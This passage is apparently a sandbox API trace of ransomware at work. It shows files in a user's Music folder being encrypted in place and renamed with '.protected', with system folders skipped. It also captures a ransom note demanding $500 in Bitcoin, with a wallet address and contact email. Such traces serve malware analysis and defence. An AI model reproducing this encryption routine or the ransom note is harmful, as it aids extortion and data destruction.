HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrIW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".protected") returned 0x0 [0092.365] lstrcmpW (lpString1="Xi29XN5DxSvIHVKOBV.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.365] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.365] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\xi29xn5dxsvihvkobv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".txt") returned 0x0 [0092.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".rar") returned 0x0 [0092.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav") returned 80 [0092.365] StrStrW (lpFirst="Xi29XN5DxSvIHVKOBV.wav", lpSrch=".zip") returned 0x0 [0092.365] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.366] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.367] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.367] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.367] CloseHandle (hObject=0xd4) returned 1 [0092.367] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav.protected") returned 90 [0092.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\xi29xn5dxsvihvkobv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\Xi29XN5DxSvIHVKOBV.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\xi29xn5dxsvihvkobv.wav.protected")) returned 1 [0092.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="Windows") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="Program Files") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="Program Files (x86)") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="$Recycle.bin") returned 1 [0092.368] lstrcmpiW (lpString1="z9JVlpIKm.wav", lpString2="System Volume Information") returned 1 [0092.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.368] StrStrIW (lpFirst="z9JVlpIKm.wav", lpSrch=".protected") returned 0x0 [0092.368] lstrcmpW (lpString1="z9JVlpIKm.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.368] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.368] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\z9jvlpikm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.369] StrStrW (lpFirst="z9JVlpIKm.wav", lpSrch=".txt") returned 0x0 [0092.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.369] StrStrW (lpFirst="z9JVlpIKm.wav", lpSrch=".rar") returned 0x0 [0092.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.369] StrStrW (lpFirst="z9JVlpIKm.wav", lpSrch=".zip") returned 0x0 [0092.369] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.370] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.371] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.371] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.371] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.371] CloseHandle (hObject=0xd4) returned 1 [0092.372] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav.protected") returned 81 [0092.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\z9jvlpikm.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\z9jvlpikm.wav.protected")) returned 1 [0092.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.372] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\RESTORE_FILES.txt") returned 75 [0092.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.373] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.373] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.374] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.374] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.374] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.374] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.374] CloseHandle (hObject=0xb4) returned 1 [0092.375] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="Windows") returned -1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="Program Files") returned -1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="Program Files (x86)") returned -1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="$Recycle.bin") returned 1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="System Volume Information") returned -1 [0092.375] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrIW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".protected") returned 0x0 [0092.375] lstrcmpW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.375] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.375] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mb251 agjjo znjct8ju.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".txt") returned 0x0 [0092.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".rar") returned 0x0 [0092.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".zip") returned 0x0 [0092.375] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.376] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.376] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.376] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.376] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.376] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.376] CloseHandle (hObject=0xb4) returned 1 [0092.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3.protected") returned 74 [0092.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mb251 agjjo znjct8ju.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mb251 agjjo znjct8ju.mp3.protected")) returned 1 [0092.377] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.377] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="Windows") returned -1 [0092.377] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="Program Files") returned 1 [0092.377] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="Program Files (x86)") returned 1 [0092.377] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="$Recycle.bin") returned 1 [0092.378] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="System Volume Information") returned -1 [0092.378] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrIW (lpFirst="QgFLUv.wav", lpSrch=".protected") returned 0x0 [0092.378] lstrcmpW (lpString1="QgFLUv.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qgfluv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrW (lpFirst="QgFLUv.wav", lpSrch=".txt") returned 0x0 [0092.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrW (lpFirst="QgFLUv.wav", lpSrch=".rar") returned 0x0 [0092.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrW (lpFirst="QgFLUv.wav", lpSrch=".zip") returned 0x0 [0092.378] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.379] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.379] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.379] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.379] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.379] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.379] CloseHandle (hObject=0xb4) returned 1 [0092.379] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav.protected") returned 60 [0092.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qgfluv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qgfluv.wav.protected")) returned 1 [0092.380] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="Windows") returned -1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="Program Files") returned 1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="Program Files (x86)") returned 1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="$Recycle.bin") returned 1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="System Volume Information") returned 1 [0092.380] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrIW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".protected") returned 0x0 [0092.380] lstrcmpW (lpString1="U-9jEHg7uBi.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0092.380] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.380] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u-9jehg7ubi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".txt") returned 0x0 [0092.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".rar") returned 0x0 [0092.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".zip") returned 0x0 [0092.380] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.381] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.381] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.381] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.381] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.381] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.381] CloseHandle (hObject=0xb4) returned 1 [0092.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a.protected") returned 65 [0092.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u-9jehg7ubi.m4a"), 